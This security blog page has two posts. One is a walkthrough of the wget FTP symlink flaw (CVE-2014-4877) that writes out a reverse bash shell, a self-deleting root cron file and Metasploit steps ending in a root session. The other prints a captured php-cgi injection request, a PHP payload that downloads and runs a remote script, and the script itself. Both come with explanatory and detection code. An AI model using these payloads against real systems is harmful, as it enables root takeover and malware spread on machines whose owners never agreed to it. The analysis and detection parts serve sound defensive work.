2014. 10. 31. 18:03

Wget FTP Symlink Attack Vulnerability


http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html


[Bug-wget] GNU wget 1.16 released

It is available for download here:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz

and the GPG detached signatures using the key E163E1EA:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig

To reduce load on the main server, you can use this redirector service
which automatically redirects you to a mirror:

http://ftpmirror.gnu.org/wget/wget-1.16.tar.gz
http://ftpmirror.gnu.org/wget/wget-1.16.tar.xz

* Noteworthy changes in Wget 1.16

** No longer create local symbolic links by default.  Closes CVE-2014-4877.

** Use libpsl for verifying cookie domains.

** Default progress bar output changed.

** Introduce --show-progress to force display the progress bar.

** Introduce --no-config.  The wgetrc files will not be read.

** Introduce --start-pos to allow starting downloads from a specified position.

** Fix a problem with ISA Server Proxy and keep-alive connections.


"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"



Exploitation

We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.

msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R
0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112

Next we create a crontab file that runs once a minute, launches this command, and deletes itself:

cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell
EOD

Now we start up msfconsole and configure a shell listener:

msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash
msf exploit(handler) > set LHOST 192.168.0.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.4:4444

Finally we switch to the wget module itself:

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell
msf auxiliary(wget_symlink_file_write) > set SRVPORT 21
msf auxiliary(wget_symlink_file_write) > run
[+] Targets should run: $ wget -m ftp://192.168.0.4:21/
[*] Server started.

At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/

[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> RETR cronshell
[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500

msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root),1001(rvm)
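To make the 1.16 release note ("no longer create local symbolic links by default") concrete, here is an added model of the write path behind CVE-2014-4877; it is not wget's or Rapid7's code. A mirroring client that turns an untrusted LIST entry into a local symlink lets the server re-present the same name as a directory and have the next RETR land outside the mirror root; the two defences shown are the retr-symlinks behaviour and a realpath containment check. The listing lines, the "outside" directory standing in for /etc/cron.d, and the file content are all constructed.

```python
import os
import re
import tempfile

# One Unix-style LIST line: type, perms, links, owner, group, size, three date fields, name[ -> target].
LIST_RE = re.compile(
    r"^(?P<kind>[-dl])[rwxsStT-]{9}\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+\S+\s+"
    r"(?P<name>[^\s>]+)(?:\s->\s(?P<target>\S+))?$"
)

def parse_listing(text):
    """Turn a LIST -a reply into (kind, name, symlink_target) tuples."""
    out = []
    for line in text.splitlines():
        m = LIST_RE.match(line.strip())
        if m:
            out.append((m.group("kind"), m.group("name"), m.group("target")))
    return out

def apply_listing(root, entries, retr_symlinks):
    """Materialise a listing under the mirror root. retr_symlinks=False creates a local symlink
    wherever the server points (pre-1.16 default); retr_symlinks=True never does (1.16 / retr-symlinks=on)."""
    for kind, name, target in entries:
        path = os.path.join(root, name)
        if kind == "l" and not retr_symlinks:
            os.symlink(target, path)  # target chosen by the remote server
        elif kind == "d":
            os.makedirs(path, exist_ok=True)

def write_retrieved(root, relpath, data, contained_only):
    """Store a RETR'd file; with contained_only, refuse a destination whose resolved path leaves root."""
    dest = os.path.join(root, relpath)
    real_root, real_dest = os.path.realpath(root), os.path.realpath(dest)
    if contained_only and not real_dest.startswith(real_root + os.sep):
        return None
    with open(dest, "wb") as f:
        f.write(data)
    return real_dest

def simulate(retr_symlinks, contained_only):
    """Replay listing -> listing -> RETR in a temp dir; returns (landed outside mirror, written at all)."""
    with tempfile.TemporaryDirectory() as tmp:
        outside, root = os.path.join(tmp, "outside"), os.path.join(tmp, "mirror")
        for d in (outside, root):
            os.makedirs(d)
        # Constructed listings: 'foo' first appears as a symlink, then as a directory.
        apply_listing(root, parse_listing(f"lrwxrwxrwx 1 root root 13 Oct 27 23:19 foo -> {outside}"), retr_symlinks)
        apply_listing(root, parse_listing("drwxr-xr-x 2 root root 4096 Oct 27 23:19 foo"), retr_symlinks)
        written = write_retrieved(root, "foo/cronshell", b"# constructed stand-in content\n", contained_only)
        return os.path.exists(os.path.join(outside, "cronshell")), written is not None
```

Only the combination "local symlinks allowed" plus "no containment check" writes outside the mirror; either defence alone stops it, and the containment check also refuses the write rather than silently redirecting it.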


2014. 9. 4. 10:03

Web attack sample: shellcode


POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0

<?php system("wget http://221.132.xxx.26/sh -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh");

/tmp/sh (the script fetched by the PHP payload above):

#!/bin/bash

dontrun=""
arch=`uname -m`
cd /dev/shm

function runPnscan()
{
cd /dev/shm
chmod +x pnscan php
bash run &
}

function isPnscanOn()
{
        pid=`pidof pnscan`
        if [ "$pid" == "" ];then
                retval=0
        else
                retval=1
        fi
        echo "$retval"
}

        cd /dev/shm
        if [ ! -f pnscan ];then
        case "$arch" in
                "x86_64")
                wget -q http://bont.xxx/ar/64.tgz -O 64.tgz
                tar xvzf 64.tgz
                rm -rf 64.tgz
                ;;
                *)
                wget -q http://bont.xxx/ar/86.tgz -O 86.tgz
                tar xvzf 86.tgz
                rm -rf 86.tgz
                ;;
        esac
        fi

if [ $(isPnscanOn) == 1 ];then
#        echo "Running"
        exit
else
        echo "Not Running"
        if [ "$dontrun" != "1" ];then
                $(runPnscan)
        fi
fi

rm -rf /dev/shm/run
rm -rf /dev/shm/pnscan
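The request line above only reads as php.ini directives once it is percent-decoded, which is why it slips past simple pattern matching. The following added detection routine (not from the page or any product) decodes request lines and flags the php-cgi argument-injection shape: a query string with no literal "=" (so the CGI layer hands it to the interpreter as argv) that decodes to "-d key=value" pairs. The sample list embeds the captured request line from the post together with two constructed benign lines; the directive set is taken from that sample.

```python
import re
from urllib.parse import unquote_plus

# php.ini directives the captured request forces; any of them inside a query string is a strong signal.
RISKY_DIRECTIVES = {
    "allow_url_include", "safe_mode", "suhosin.simulation", "disable_functions",
    "open_basedir", "auto_prepend_file", "cgi.force_redirect", "cgi.redirect_status_env",
}
REQ_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/\d\.\d$")
DIRECTIVE_RE = re.compile(r"-d\s+([\w.]+)=(\S*)")

def analyse(request_line):
    """Decode one HTTP request line and describe it; None if it is not a request line.
    CGI convention: a query string containing no literal '=' is passed to the script as
    command-line arguments, so the attacker encodes '=' as %3D to smuggle -d directives."""
    m = REQ_RE.match(request_line.strip())
    if not m:
        return None
    path, _, raw_query = m.group("target").partition("?")
    decoded = unquote_plus(raw_query)  # '+' becomes a space, as the CGI layer would see it
    argv_style = "=" not in raw_query and decoded.startswith("-")
    directives = dict(DIRECTIVE_RE.findall(decoded))
    return {
        "method": m.group("method"), "path": path, "argv_style": argv_style,
        "directives": directives, "risky": sorted(set(directives) & RISKY_DIRECTIVES),
    }

def scan(request_lines):
    """Return the findings for every request line that carries argv-style risky -d directives."""
    hits = []
    for line in request_lines:
        r = analyse(line)
        if r and r["argv_style"] and r["risky"]:
            hits.append(r)
    return hits

# Constructed sample: two benign request lines around the captured one from this post.
SAMPLE_REQUESTS = [
    "GET /index.php?id=5&page=2 HTTP/1.1",
    "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0",
    "GET /cgi-bin/php HTTP/1.0",
]
```

Decoding the captured line yields eight directives, with auto_prepend_file=php://input being the one that makes the POST body (the system("wget ...") call above) execute.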


